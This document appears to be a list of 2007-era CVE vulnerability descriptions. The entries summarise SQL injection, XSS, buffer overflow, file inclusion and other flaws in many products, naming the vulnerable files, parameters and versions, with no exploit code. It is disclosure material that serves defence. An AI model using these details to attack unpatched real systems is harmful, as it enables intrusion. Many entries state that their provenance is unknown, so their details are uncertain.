Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 and 10.2.0.3 allow remote authenticated users to have unknown impact via (1) DBMS_JAVA_TEST in the JavaVM component (DB01), (2) Oracle Text component (DB09), and (3) MDSYS.SDO_GEOR_INT in the Spatial component (DB15).  NOTE: a reliable researcher claims that DB01 is SQL injection in DBMS_PRVTAQIS.
Cross-site scripting (XSS) vulnerability in takeprofedit.php in TBDev.NET DR 010306 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the avatar parameter.  NOTE: this may be related to the tracker program in the Janitor package.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in takeprofedit.php in TBDev.NET DR 11-10-05-BETA-SF1:111005 and earlier allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the avatar parameter.  NOTE: this may be related to the tracker program in the Janitor package.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple stack-based buffer overflows in (a) InterActual Player 2.60.12.0717 and (b) Roxio CinePlayer 3.2 allow remote attackers to execute arbitrary code via a (1) long FailURL attribute in the IAMCE ActiveX Control (IAMCE.dll) or a (2) long URLCode attribute in the IAKey ActiveX Control (IAKey.dll).  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in Hitachi Cosminexus V4 through V7, Processing Kit for XML before 20070511, Developer's Kit for Java before 20070312, and third-party products that use this software, allows attackers to have an unknown impact via certain GIF images, related to use of GIF image processing APIs by a Java application.
SQL injection vulnerability in admin/index.php in Inmostore 4.0 allows remote attackers to execute arbitrary SQL commands via the Password field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Absolute path traversal vulnerability in a certain ActiveX control in PGPBBox.dll in EldoS SecureBlackbox (sbb) 5.1.0.112 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveToFile method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Webmatic before 2.7 have unknown impact and attack vectors, related to the "administration area."
Directory traversal vulnerability in Ada Image Server (ImgSvr) 0.6.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the template parameter to the default URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this is probably a different issue than CVE-2004-2464.  NOTE: it was later reported that 0.6.21 and earlier is also affected.
Multiple buffer overflows in Konst CenterICQ 4.9.11 through 4.21 allow remote attackers to execute arbitrary code via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this might overlap CVE-2007-0160.
Multiple cross-site scripting (XSS) vulnerabilities in HiddenChest "is ve Bayi Basvuru Formu" (Yb ve Bayi Babvuru Formu) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in oku.asp in Levent Veysi Portal 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in PHP Lite Calendar Express 2.2 allow remote attackers to execute arbitrary SQL commands via the cid parameter to (1) login.php, (2) auth.php, and (3) subscribe.php. NOTE: the month.php, year.php, week.php, and day.php vectors are already covered by CVE-2005-4009.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
inc/vul_check.inc in phpVideoPro before 0.8.8 permits non-alphanumeric characters in the sess_id parameter, which has unknown impact and remote attack vectors, probably cross-site scripting (XSS).
Cross-site scripting (XSS) vulnerability in ara.asp in Efendy Blog 1.0 allows remote attackers to inject arbitrary web script or HTML via the ara parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Esqlanelapse before 2.6 have unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in Rapid Install Web Server in Oracle Application Server 11i allows remote attackers to inject arbitrary web script or HTML via a URL to the "Secondary Login Page", as demonstrated using (1) pls/ and (2) pls/MSBEP004/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Ripe Website Manager 0.8.9 and earlier allows remote attackers to obtain configuration information via a direct request to includes/phpinfo.php, which calls the phpinfo function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in kayit.asp in Gorki Online Santrac Sitesi allow remote attackers to inject arbitrary web script or HTML via the (1) kullanici, (2) posta, or (3) takim_adi parameter to uyeler.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in _mprosrv in Progress Software OpenEdge before 9.1E0422, and 10.x before 10.1B01, allows remote attackers to have an unknown impact via a malformed TCP/IP message.
Unspecified vulnerability in Microsoft Excel 2003 SP2 allows remote attackers to have an unknown impact via unspecified vectors, possibly related to the sheet name, as demonstrated by 2670.xls.
SQL injection vulnerability in member.php in 6ALBlog allows remote attackers to execute arbitrary SQL commands via the member parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in phpTrafficA before 1.4.2 allow remote attackers to have an unknown impact via the file parameter to (1) plotStatBar.php or (2) plotStatPie.php, different vectors than CVE-2007-1076.
The moveim function in cgi-bin/cgi-lib/instantmessage.pl in web-app.org WebAPP before 0.9.9.7 uses the tocat parameter as a subdirectory name when moving an instant message, which has unknown impact and remote attack vectors.
cgi-bin/cgi-lib/instantmessage.pl in web-app.org WebAPP before 0.9.9.7 uses the From field of an instant message as the beginning of the .dat file name when the (1) imview2 or (2) imview3 function reads (a) an internal IM, or a message from a (b) guest or (c) removed member, which has unknown impact and remote attack vectors.
The getcgi function in cgi-bin/cgi-lib/subs.pl in web-app.org WebAPP before 0.9.9.7 attempts to parse query strings that contain (1) non-printing characters, (2) certain printing characters that do not commonly occur in URLs, or (3) invalid URL encoding sequences, which has unknown impact and remote attack vectors.
The (1) login, (2) admin profile edit, (3) reminder, (4) edit profile, (5) profile view, (6) gallery view, (7) gallery comment, and (8) gallery feedback capabilities in web-app.org WebAPP before 0.9.9.7 do not verify presence of users in memberlist.dat, which has unknown impact and remote attack vectors.
The Random Cookie Password functionality in the loaduser function in cgi-bin/cgi-lib/subs.pl in web-app.org WebAPP before 0.9.9.7 does not clear the (1) username, (2) password, (3) usertheme, and (4) userlang cookies for unauthorized users, which has unknown impact and remote attack vectors.
The editprofile3 function in cgi-bin/cgi-lib/user.pl in web-app.org WebAPP before 0.9.9.7 does not properly check the (1) themes.dat, (2) languages.dat, (3) profession.dat, (4) gen.dat, (5) marstat.dat, (6) states.dat, and (7) ages.dat files before saving profile settings of members, which has unknown impact and remote attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in defter_yaz.asp in Lebisoft zdefter 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ad and (2) konu parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Simple CGI Wrapper (scgiwrap) in cPanel before 10.9.1, and 11.x before 11.4.19-R14378, allows remote attackers to obtain sensitive information via a direct request, which reveals the path in an error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Simple CGI Wrapper (scgiwrap) in cPanel before 10.9.1, and 11.x before 11.4.19-R14378, allows remote attackers to inject arbitrary web script or HTML via the URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in ageet AGEphone before 1.6.3 allow remote attackers to have an unknown impact via malformed SIP packets.
Multiple PHP remote file inclusion vulnerabilities in SerWeb 0.9.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter to (1) html/load_apu.php or (2) html/mail_prepend.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors.
Multiple PHP remote file inclusion vulnerabilities in YourFreeScreamer 1.0, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the serverPath parameter to bodyTemplate.php in (1) templates/Classic/, (2) templates/Classic Guestbook/, (3) templates/DarkNights/, and (4) templates/Simplistic/, different vectors than CVE-2007-3271.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in arama.asp in TDizin allows remote attackers to inject arbitrary web script or HTML via the ara parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the localization before 1.2 module for WIKINDX allows attackers to access certain administrative capabilities via unknown vectors.
Cross-site scripting (XSS) vulnerability in index.php in Site@School (S@S) 2.4.10 allows remote attackers to inject arbitrary web script or HTML via the q parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.cfm in FuseTalk 2.0 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the PD tools component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier has unknown impact and attack vectors.
Unspecified vulnerability in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier has unknown impact and attack vectors, related to "incorrect authorization on a remote interface to the SDO repository."
Buffer overflow in MeCab before 0.96 has unknown impact and attack vectors.
Unspecified vulnerability in Sun Java System Directory Server (slapd) 6.0, and 5.2 with Patch 3 or 4, allows remote attackers to modify certain data via unknown vectors.
Cross-site scripting (XSS) vulnerability in 404.php in Domain Technologie Control (DTC) before 0.25.9 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (REQUEST_URI). NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in nptoken.mox in the Cellosoft Tokens Object 2.0.0.6 extension for Vitalize! allows remote attackers to execute arbitrary code via a long string argument to the RemoveChr method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in auth.php in Just For Fun Network Management System (JFFNMS) 0.8.4-pre2 allows remote attackers to execute arbitrary SQL commands via the pass parameter.  NOTE: this issue reportedly exists because of an initial incomplete fix for CVE-2007-3190. The provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in smtpdll.dll in the SMTP service in 602Pro LAN SUITE 2003 2003.0.03.0828 allows remote attackers to execute arbitrary code via an e-mail message with a long address. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in ERFAN WIKI 1.00 allows remote attackers to inject arbitrary web script or HTML via the title parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in Help and Support Center before 4.4 C on HP Windows systems allows remote attackers to read or write arbitrary files via unknown vectors.
Unspecified vulnerability in eGroupWare before 1.2.107-2 has unknown impact and attack vectors related to ADOdb.  NOTE: due to lack of details from the vendor, it is uncertain whether this issue is already covered by another CVE identifier.
Unspecified vulnerability in Walter Zorn wz_tooltip.js (aka wz_tooltips) before 4.01, as used by eGroupWare before 1.2.107-2 and other packages, has unknown impact and remote attack vectors.
Multiple PHP remote file inclusion vulnerabilities in the OpenWiki (formerly JD-Wiki) component (com_jd-wiki) 1.0.2, and possibly earlier, for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) dwpage.php or (2) wantedpages.php, different vectors than CVE-2006-4074.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the Andy Frank Beatnik 1.0 extension for Firefox allows remote attackers to inject arbitrary web script or HTML via an RSS feed.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Symantec Reporting Server 1.0.197.0, and other versions before 1.0.224.0, as used in Symantec Client Security 3.1 and later, and Symantec AntiVirus Corporate Edition (SAV CE) 10.1 and later, allows attackers to "disable the authentication system" and bypass authentication via unknown vectors.
SQL injection vulnerability in haberoku.asp in Hunkaray Okul Portaly 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter to (1) calendar.php, (2) compose.php, and (3) index.php, different vectors than CVE-2007-2826.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Codelib Linker 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the kword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the pdwizard.ocx ActiveX object for Internet Explorer 5.01, 6 SP1, and 7 allows remote attackers to execute arbitrary code via unknown vectors related to Microsoft Visual Basic 6 objects and memory corruption, aka "ActiveX Object Memory Corruption Vulnerability."
Unspecified vulnerability in libclamav/phishcheck.c in ClamAV before 0.90.3 and 0.91 before 0.91rc1, when running on Solaris, allows remote attackers to cause a denial of service (hang) via unknown vectors related to the isURL function and regular expressions.
unsp.c in ClamAV before 0.90.3 and 0.91 before 0.91rc1 does not properly calculate the end of a certain buffer, with unknown impact and remote attack vectors.
Symantec Reporting Server 1.0.197.0, and other versions before 1.0.224.0, as used in Symantec Client Security 3.1 and later, and Symantec AntiVirus Corporate Edition (SAV CE) 10.1 and later, does not initialize a critical variable, which allows attackers to create arbitrary executable files via unknown manipulations of a file that is created during data export.
Unspecified vulnerability in sysmgt.websm.rte in IBM AIX 5.2.0 and 5.3.0 has unknown impact and attack vectors.
Centrinity FirstClass 8.3 and earlier, and Server and Internet Services 8.0 and earlier, do not properly handle a URL with a null ("%00") character, which allows remote attackers to conduct cross-site scripting (XSS) attacks.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in cgi/block.cgi in 8e6 R3000 Internet Filter allow remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) CAT, and (3) USER parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Scallywag 2005-04-25 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skin_name parameter to template.php in (1) skin/dark/, (2) skin/gold/, or (3) skin/original/, a different vector than CVE-2007-2900.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8.4.7-P1 generate predictable DNS query identifiers when sending outgoing queries such as NOTIFY messages when answering questions as a resolver, which allows remote attackers to poison DNS caches via unknown vectors.  NOTE: this issue is different from CVE-2007-2926.
Format string vulnerability in the IBM Lenovo Access Support acpRunner ActiveX control, as distributed in acpcontroller.dll before 1.2.8.0 and possibly acpir.dll before 1.0.0.9 (Automated Solutions 1.0 before fix pack 1), allows remote attackers to execute arbitrary code via format string specifiers in unknown data.
Multiple buffer overflows in RealNetworks GameHouse dldisplay ActiveX control (ghdlctl.dll) allow remote attackers to execute arbitrary code via unknown vectors.
SQL injection vulnerability in includes/rating.php in 2z Project 0.9.5 allows remote attackers to execute arbitrary SQL commands via the post_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in news.asp in ASP-Nuke 2.0.7 allows remote attackers to inject arbitrary web script or HTML via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The VFAT compat ioctls in the Linux kernel before 2.6.21.2, when run on a 64-bit system, allow local users to corrupt a kernel_dirent struct and cause a denial of service (system crash) via unknown vectors.
Stack-based buffer overflow in the SetPath function in the shComboBox ActiveX control (shcmb80.ocx) in Sky Software Shell MegaPack ActiveX 8.0 allows remote attackers to execute arbitrary code via a long argument.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
gfax 0.4.2 and probably other versions creates temporary files insecurely, which allows local users to execute arbitrary commands via unknown vectors.
SQL injection vulnerability in down_indir.asp in Gazi Download Portal allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in BES before 3.5.0 in OPeNDAP 4 (Hydrax) before 1.2.1 allows remote attackers to list filesystem contents and obtain sensitive information via unknown vectors.
Unspecified vulnerability in xajax before 0.2.5 has unknown impact and attack vectors, not related to XSS.
SQL injection vulnerability in index.php in the MyConference 1.0 module for Xoops allows remote attackers to execute arbitrary SQL commands via the cid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
** DISPUTED ** The soap extension in PHP calls php_rand_r with an uninitialized seed variable, which has unknown impact and attack vectors, a related issue to the mcrypt_create_iv issue covered by CVE-2007-2727. Note: The PHP team argue that this is not a valid security issue.
Unspecified vulnerability in akismet.php in Matt Mullenweg Akismet before 2.0.2, a WordPress plugin, has unknown impact and attack vectors.
Unspecified vulnerability in MH Software Connect Daily before 3.3.3 has unknown impact and attack vectors.
PHP remote file inclusion vulnerability in functions/prepend_adm.php in NagiosQL 2.00-P00 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the SETS[path][IT] parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP file inclusion vulnerability in index.php in Ivan Peevski gallery 0.3 in Simple PHP Scripts (sphp) allows remote attackers to execute arbitrary PHP code via a UNC share pathname or a local file pathname in the gallery parameter, which is accessed by the file_exists function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in NetWin Webmail 3.1s-1 in SurgeMail before 3.8i2 has unknown impact and remote attack vectors, possibly a format string vulnerability that allows remote code execution.
Unspecified vulnerability in phpTodo before 0.8.1 allows remote attackers to have an unknown impact via newlines in regular expressions to (1) index.php, (2) feed.php, (3) prefs.php, and (4) todolist.php; and (5) classTodoItem.php and (6) phpTodoUser.php in libs/.  NOTE: some of these details are obtained from third party information.
PHP remote file inclusion vulnerability in common/errormsg.php in aForum 1.32 and possibly earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the header parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
RSAuction 2.73.1.3 allows remote authenticated users to move their own account status from Suspended to Active via a direct request for the activation URL that is provided at the time of account registration. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in search/list/action_search/index.php in ACP3 4.0 beta 3 allows remote attackers to have unknown impact, relating to "Cookie Manipulation", via the form[search_term] parameter.
MOStlyDB Admin in Mambo 4.6.1 does not properly check privileges, which allows remote authenticated administrators to have an unknown impact via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Default.aspx in Podium CMS allows remote attackers to have an unknown impact, possibly session fixation, via a META HTTP-EQUIV Set-cookie expression in the id parameter, related to "cookie manipulation."  NOTE: this issue might be cross-site scripting (XSS).
Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation."
Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508.
Buffer overflow in the user_filter_factory_create function in PHP before 5.2.2 has unknown impact and local attack vectors.
Buffer overflow in the make_http_soap_request function in PHP before 5.2.2 has unknown impact and remote attack vectors, possibly related to "/" (slash) characters.
Unspecified vulnerability in HP ProCurve 9300m Series switches with software 08.0.01c through 08.0.01j allows remote attackers to cause a denial of service via unknown vectors, a different switch series than CVE-2006-4015.
Unspecified vulnerability in Novell SecureLogin (NSL) 6 SP1 before 6.0.106 has unknown impact and remote attack vectors, related to Active Directory (AD) password changes.
Unspecified vulnerability in the ADSCHEMA utility in Novell SecureLogin (NSL) 6 SP1 before 6.0.106 has unknown impact and remote attack vectors, related to granting "users excess permissions to their own attributes."
Cross-site scripting (XSS) vulnerability in sendcard.php in Sendcard 3.4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the form parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Sun Solaris 9, when Solaris Auditing (BSM) is enabled for file read, write, attribute modify, create, or delete audit classes, allows local users to cause a denial of service (panic) via unknown vectors, possibly related to the audit_savepath function.
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)17 allows remote attackers to cause a denial of service (device reload) via unknown vectors related to VPN connection termination and password expiry.
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 before 7.2(2)8, when using Layer 2 Tunneling Protocol (L2TP) or Remote Management Access, allows remote attackers to bypass LDAP authentication and gain privileges via unknown vectors.
PHP remote file inclusion vulnerability in modules/admin/include/config.php in FireFly 1.1.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Ariadne 2.4.1 allows remote attackers to inject arbitrary web script or HTML via the ARLogin parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in utilities/search.asp in nukedit 4.9.7b allows remote attackers to inject arbitrary web script or HTML via the terms parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
ManageEngine PasswordManager Pro (PMP) allows remote attackers to obtain administrative access to a database by injecting a certain command line for the mysql program, as demonstrated by the "-port 2345" and "-u root" arguments.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in MoinMoin 1.5.7 allows remote attackers to inject arbitrary web script or HTML via the do parameter in an AttachFile action, a different vulnerability than CVE-2007-0857.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not clear potentially sensitive memory before use, which allows remote attackers to read memory from a web browser via unknown vectors related to Java applets.
Unspecified vulnerability in InterVations NaviCOPA Web Server 2.01 20070323 allows remote attackers to cause a denial of service (daemon crash) via crafted HTTP requests, as demonstrated by long requests containing '\A' characters, probably a different issue than CVE-2006-5112 and CVE-2007-1733.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in the WinDVDX ActiveX control in InterVideo Home Theater 2.1.13.0 and 2.5.13.58 allow remote attackers to execute arbitrary code via a long string argument to the (1) GetDiscType or (2) AddFileList method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
NMMediaServer.exe in Nero MediaHome 2.5.5.0 and CE 1.3.0.4 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted packet that contains two CRLF sequences.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the search functionality in SilverStripe 2.0.0 has unknown impact and attack vectors.
Unspecified vulnerability in the admin script in Open Business Management (OBM) before 2.0.0 allows remote attackers to have an unknown impact by calling the script "in txt mode from a browser."
Multiple SQL injection vulnerabilities in Crea-Book 1.0, and possibly earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter to (a) configurer.php, (b) connect.php, (c) delete.php, (d) delete2.php, (e) index.php, (f) infos.php, (g) membres.php, (h) modif-infos.php, (i) modif-message.php, (j) modif.php, (k) uninstall.php, or (l) uninstall_table.php in admin/, different vectors than CVE-2007-2000.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in cas.php in FloweRS 2.0 allows remote attackers to inject arbitrary web script or HTML via the den parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in HP-UX B.11.00 and B.11.11, when running sendmail 8.9.3 or 8.11.1; and HP-UX B.11.23 when running sendmail 8.11.1; allows remote attackers to cause a denial of service via unknown attack vectors.  NOTE: due to the lack of details from HP, it is not known whether this issue is a duplicate of another CVE such as CVE-2006-1173 or CVE-2006-4434.
Multiple SQL injection vulnerabilities in calendar.php in MyBB (aka MyBulletinBoard) 1.2.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) year or (2) month parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Static code injection vulnerability in process.php in AimStats 3.2 and earlier allows remote attackers to inject PHP code into config.php via the databasehost parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The imagecomments function in classes.php in MiniGal b13 allow remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the (1) name or (2) email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the HTML Server in Oracle JD Edwards EnterpriseOne SP23_Q1 and 8.96.I1 has unknown impact and local attack vectors, aka JDE01.
Unspecified vulnerability in the PeopleSoft Enterprise Human Capital Management component in Oracle PeopleSoft Enterprise 8.9 has unknown impact and attack vectors, aka PSEHCM01.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise 8.47.12 and 8.48.08 has unknown impact and attack vectors, aka PSE02.
Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.22.14, 8.47.12, and 8.48.08 has unknown impact and attack vectors, aka PSE01.
Unspecified vulnerability in Workflow Cartridge, as used in Oracle Database Server 9.2.0.1, 10.1.0.2, and 10.2.0.1; Application Server 9.0.4.3 and 10.1.2.0.2; Collaboration Suite 10.1.2; and E-Business Suite; has unknown impact and remote authenticated attack vectors, aka OWF01.
Unspecified vulnerability in the Agent component in Oracle Enterprise Manager 9.2.0.8 has unknown impact and remote attack vectors, aka EM01.
Unspecified vulnerability in the Sales Online component for Oracle E-Business Suite 11.5.10 has unknown impact and remote authenticated attack vectors, aka APPS08.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 12.0.0 have unknown impact and remote attack vectors via (1) Application Object Library (APPS04), iStore (2) APPS05 and (3) APPS06, (4) iSupport (APPS07), (5) Trade Management (APPS09), (6) Applications Manager (APPS10), and (7) Oracle Report Manager (APPS03).
Unspecified vulnerability in Oracle E-Business Suite 11.5.10CU2 has unknown impact and remote attack vectors in the (1) Common Applications (APPS01) and (2) iProcurement (APPS02).
Unspecified vulnerability in Collaborative Workspace in Oracle Collaboration Suite 10.1.2 has unknown impact and attack vectors, aka OCS01.
Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.4.1.0 has unknown impact and remote attack vectors, aka AS05.
Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.3 up to 10.1.3.2.0, 10.1.2 up to 10.1.2.2.0, and 9.0.4.3 has unknown impact and attack vectors, aka AS04.
Unspecified vulnerability in the Wireless component in Oracle Application Server 9.0.4.3 has unknown impact and attack vectors, aka AS03.
Unspecified vulnerability in the COREid Access component in Oracle Application Server 7.0.4.4 has unknown impact and attack vectors, aka AS02.
Unspecified vulnerability in the Upgrade/Downgrade component of Oracle Database 9.0.1.5 and 9.2.0.7 has unknown impact and attack vectors, aka DB13.  NOTE: as of 20070424, Oracle has not disputed reliable claims that this is a buffer overflow involving the "mig utility."
Unspecified vulnerability in the Oracle Text component in Oracle Database 9.0.1.5+ and 9.2.0.5 has unknown impact and attack vectors, aka DB12.  NOTE: as of 20070424, Oracle has not disputed reliable claims that this involves a buffer overflow in the ctxsrv server daemon.
Unspecified vulnerability in the Advanced Replication component in Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.5 has unknown impact and attack vectors, aka DB10.  NOTE: as of 20070424, Oracle has not disputed claims that these are buffer overflows in kkzi.o for the SYS.DBMS_SNAP_INTERNAL package using the (1) SNAP_OWNER or (2) SNAP_NAME parameters.
Unspecified vulnerability in the Change Data Capture (CDC) component in Oracle Database 9.2.0.7, 10.1.0.5, and 10.2.0.2 has unknown impact and attack vectors, aka DB09.  NOTE: as of 20070424, oracle has not disputed reliable claims that this issue involves multiple SQL injection vulnerabilities in the DBMS_CDC_PUBLISH with remote authenticated vectors involving the "java classes in CDC.jar."
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 and 10.2.0.2 have unknown impact and remote authenticated attack vectors, related to (1) Change Data Capture (CDC), aka DB08, and (2) Oracle Instant Client, aka DB11.  NOTE: as of 20070424, oracle has not disputed reliable claims that these issues are buffer overflows using a long CHANGE_TABLE_NAME parameter to the DBMS_CDC_IPUBLISH.CHGTAB_CACHE procedure (DB08) and Oracle Instant Client genezi utility (DB11).
SQL injection vulnerability in the Upgrade/Downgrade component (DBMS_UPGRADE_INTERNAL) for Oracle Database 10.1.0.5 allows remote authenticated users to execute arbitrary SQL commands via unknown vectors, aka DB07.  NOTE: as of 20070424, Oracle has not disputed reliable claims that DB07 is actually for multiple issues.
Unspecified vulnerability in the Authentication component for Oracle Database 10.1.0.5 and 10.2.0.3 has unknown impact and attack vectors, aka DB05.  NOTE: as of 20070424, Oracle has not disputed reliable claims that this issue allows remote authenticated users to bypass the AUTH_ALTER_SESSION security policies via a logon trigger ("AFTER LOGON ON DATABASE" trigger directive), a related issue to CVE-2006-0547.
SQL injection vulnerability in the SYS.DBMS_AQADM_SYS package in Oracle Database 9.0.1.5, 9.2.0.7, and 10.1.0.5 allows remote authenticated users to inject arbitrary SQL commands via unknown vectors, aka DB04.  NOTE: as of 20070424, Oracle has not disputed reliable claims that DB04 is actually for multiple vulnerabilities.
Unspecified vulnerability in the Core RDBMS component for Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.4 on Windows systems has unknown impact and attack vectors, aka DB03.  NOTE: as of 20070424, Oracle has not disputed reliable claims that DB03 occurs because RDBMS uses a NULL Discretionary Access Control List (DACL) for the Oracle process and certain shared memory sections, which allows local users to inject threads and execute arbitrary code via the OpenProcess, OpenThread, and SetThreadContext functions (DB03).
